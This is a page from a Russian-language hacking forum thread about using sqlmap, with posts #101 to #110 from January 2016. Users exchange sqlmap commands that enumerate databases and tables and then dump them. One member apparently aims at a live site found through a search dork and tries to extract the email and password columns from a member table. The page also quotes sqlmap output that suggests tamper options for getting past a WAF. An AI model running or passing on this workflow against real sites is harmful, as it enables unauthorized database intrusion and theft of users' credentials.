HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Вопросы по SQLMap
   
Ответ
Страница 11 из 115 « Первая < 7 8 9 10 11 12 13 14 15 2161111 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #101  
Старый 15.01.2016, 12:59
erwerr2321
Guest
Сообщений: n/a
Провел на форуме:
759330

Репутация: 147
По умолчанию
Цитата:
Сообщение от ol1ver  
ol1ver said:

у меня не спрашивает(вроде как). Левел подними, как прописать то правильно? И какие пределы значения?


--dbms=mysql --level 5
 
Ответить с цитированием

  #102  
Старый 15.01.2016, 14:47
0xrust
Guest
Сообщений: n/a
Провел на форуме:
7800

Репутация: 0
По умолчанию
Цитата:
Сообщение от ms13  
ms13 said:

--dbms=mysql --level 5
можно еще --risk 3 добавить
 
Ответить с цитированием

  #103  
Старый 15.01.2016, 15:47
erwerr2321
Guest
Сообщений: n/a
Провел на форуме:
759330

Репутация: 147
По умолчанию
Цитата:
Сообщение от 0xrust  
0xrust said:

можно еще
--risk 3
добавить
можно)
 
Ответить с цитированием

  #104  
Старый 19.01.2016, 09:26
.Light.
Guest
Сообщений: n/a
Провел на форуме:
65956

Репутация: 0
По умолчанию
как сделать дамп бд с сохранением структуры таблиц.

Таблица 1 Таблица 2 Таблица 3

11111111 222222222 333333333

А не строчками,делаю дамп получается 11111111222222222333333333 - не очень удобно
 
Ответить с цитированием

  #105  
Старый 20.01.2016, 14:02
ruslan0477
Guest
Сообщений: n/a
Провел на форуме:
5368

Репутация: 0
По умолчанию
Подскажите дамп открыл таблицу сразу а sqlmap перебирает по букве.Что я делаю не так?

sqlmap -u http://www.site.ru/showbanner.php?banner_id=' and [t] and '1'='1 --dbs
 
Ответить с цитированием

  #106  
Старый 20.01.2016, 14:40
ruslan0477
Guest
Сообщений: n/a
Провел на форуме:
5368

Репутация: 0
По умолчанию
Цитата:
Сообщение от ms13  
ms13 said:

Извини, а это ты привёл пример той команды,которую ты вводишь в терминале?
да

А дампом могу только 50 к слить
 
Ответить с цитированием

  #107  
Старый 20.01.2016, 15:52
ruslan0477
Guest
Сообщений: n/a
Провел на форуме:
5368

Репутация: 0
По умолчанию
Цитата:
Сообщение от ms13  
ms13 said:

Пробуй так!
sqlmap -u www.site.ru/showbanner.php?banner_id=X --dbs --no-cast
где X - тот id, к которому ты сначала тыкал свою каывчку, больше ничего не надо, map сам всё подберёт!
Но учти, после этой команды ты лишь узнаешь кол-во и имена БД...
Ну так дорка у меня такая и есть без id

http://www.site.ru/showbanner.php?banner_id=' and [t] and '1'='1 --dbs

просто кавычка
 
Ответить с цитированием

  #108  
Старый 20.01.2016, 16:13
erwerr2321
Guest
Сообщений: n/a
Провел на форуме:
759330

Репутация: 147
По умолчанию
Цитата:
Сообщение от ruslan0477  
ruslan0477 said:

да
А дампом могу только 50 к слить
Пробуй так!

sqlmap -u www.site.ru/showbanner.php?banner_id=X --dbs --no-cast

где X - тот id, к которому ты сначала тыкал свою каывчку, больше ничего не надо, map сам всё подберёт!

Но учти, после этой команды ты лишь узнаешь кол-во и имена БД...

Далее узнаёшь кол-во и имена таблиц в нужной БД:

sqlmap -u www.site.ru/showbanner.php?banner_id=X -D Y --tables --no-cast

где Y - имя нужной БД.

После дампишь нужную тебе таблицу:

sqlmap -u www.site.ru/showbanner.php?banner_id=X -D Y -T Z --dump --no-cast

где Z - имя нужной таблицы

Иногда, если извлекается очень медленно, можно добавить ключ --threads 10 , например - те увеличить кол-во потоков.
 
Ответить с цитированием

  #109  
Старый 20.01.2016, 16:29
ruslan0477
Guest
Сообщений: n/a
Провел на форуме:
5368

Репутация: 0
По умолчанию
Цитата:
Сообщение от ms13  
ms13 said:

Пробуй так!
sqlmap -u www.site.ru/showbanner.php?banner_id=X --dbs --no-cast
где X - тот id, к которому ты сначала тыкал свою каывчку, больше ничего не надо, map сам всё подберёт!
Но учти, после этой команды ты лишь узнаешь кол-во и имена БД...
Далее узнаёшь кол-во и имена таблиц в нужной БД:
sqlmap -u www.site.ru/showbanner.php?banner_id=X -D Y --tables --no-cast
где Y - имя нужной БД.
После дампишь нужную тебе таблицу:
sqlmap -u www.site.ru/showbanner.php?banner_id=X -D Y -T Z --dump --no-cast
где Z - имя нужной таблицы
Иногда, если извлекается очень медленно, можно добавить ключ
--threads 10
, например - те увеличить кол-во потоков.
C:\sqlmap.pyc sqlmap.pyc -u http://www.site.ru/showbanner.php?banner_id= -D sokulec_dev -T soku_member_14July2015 -C contact_email,password --dump Тоже самое.А таблицу я взял с дампера
 
Ответить с цитированием

  #110  
Старый 20.01.2016, 16:59
ruslan0477
Guest
Сообщений: n/a
Провел на форуме:
5368

Репутация: 0
По умолчанию
[17:58:04] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Please retry with the switch '--text-only' (along with --technique=BU) as this case looks like a perfect candidate (low textual content along with inability of comparison engine to detect at least one dynamic parameter). Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')

Что бы это значило?
 
Ответить с цитированием
Ответ
Страница 11 из 115 « Первая < 7 8 9 10 11 12 13 14 15 2161111 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ